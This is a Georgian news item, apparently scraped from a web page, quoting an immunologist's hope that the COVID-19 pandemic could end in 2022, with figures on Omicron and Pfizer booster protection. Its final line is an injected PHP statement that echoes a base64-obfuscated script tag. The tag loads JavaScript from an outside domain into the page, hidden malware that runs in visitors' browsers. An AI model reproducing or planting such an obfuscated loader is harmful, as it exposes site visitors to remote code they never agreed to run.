celsiusi
ავერსი საქკაბელი
ალერგოლოგ-იმუნოლოგ ბიძინა კულუმბეგოვის განცხადებით, სხვადასხვა ფაქტორის ერთობლიობის გამო, გაჩნდა იმედი, რომ 2022 წელს პანდემია დასრულდება. კულუმბეგოვმა საკითხზე „საქმიანი დილის“ ეთერში ისაუბრა.
 
"ორი დღის წინ „ტელეგრამმა“ გამოქვეყნა ბორის ჯონსონის და დიდი ბრიტანეთის მთავრობის კონსულტანტის მოსაზრება, რომ დღეს არსებული მონაცემებით, „ომიკრონის“ კლინიკური მიმდინარეობა გრიპის სირთულეს უახლოვდება. სიკვდილიანობა 5-6 ჯერ ნაკლებია, თუმცა ამავე დროს, სწრაფი გავრცელების პოტენციალი აქვს;
 
თუკი ტენდენცია გაგრძელდა და მოქალაქეების დიდმა ნაწილმა მსუბუქად გადაიტანა ინფექცია, შეიქმნა წამლები, ვაქცინაციაც თავის როლს შეასრულებს და ეს ყველაფერი ერთობლიობაში იძლევა იმედს, რომ 2022 წელი 90%-ით პანდემიის დასრულების წელი იქნება“, - ამბობს კულუმბეგოვი.
 
რაც შეეხება „ომიკრონს“ და ვაქცინაციის გავლენას ვირუსზე. ალერგოლოგ-იმუნოლოგი განმარტავს, რომ განახლებული კვლევებით, „ფაიზერით“ აცრიდან 6 თვის შემდეგ „ომიკრონის“ მიმართ დაცვის ხარისხი 20%-დან 43%-მდეა, ხოლო ბუსტერ-დოზის შემთხვევაში ეს მაჩვენებელი 75%-მდე ადის.
 
მსოფლიო პანდემიას უკვე მეორე წელია ებრძვის.
1899
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");